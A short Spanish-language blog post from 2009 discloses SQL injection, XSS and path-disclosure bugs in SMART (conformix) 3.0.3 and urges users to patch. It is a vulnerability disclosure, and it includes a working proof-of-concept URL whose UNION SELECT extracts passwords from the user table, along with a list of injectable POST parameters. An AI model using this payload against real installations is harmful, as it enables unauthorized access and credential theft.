miércoles, 4 de febrero de 2009

Bug for SMART (conformix ) v. 3.0.3 (current)


Smart es un software que ayuda a hacerle el seguimiento a los procesos de gestión relacionados con seguridad informática.
Mirando el código encontre varias cosas, solo pongo un ejemplo para que ustedes mismos investiguen un poco mas.

El bug es un tipico SQL injection, tambien hay otros bugs sencillos como XSS y errores en los scripts que me indican donde estan instalados.
Un ejemplo de SQL injection (PoC):

En el archivo: downloadlibraryfile.php

Ejemplo:
http://smarthost/downloadlibraryfile.php?fileId='2' AND 0
UNION SELECT password,password,password,password FROM user

Otros archivos posiblemente vulnerables:
* firewallrequest.php
* firewallrequestprocessing.php
puedo inyectar variables en
$srcIP=$_POST['srcIP'];
$dstIP=$_POST['dstIP'];
$srcNAT=$_POST['srcNAT'];
$dstNAT=$_POST['dstNAT'];
$port=$_POST['port'];
$protocol=$_POST['protocol'];
$justification=$_POST['justification'];
$firstname=$_POST['firstname'];

Como siempre, si estas usando esta versión entonces parcha el software.
Saludos.

Entradas populares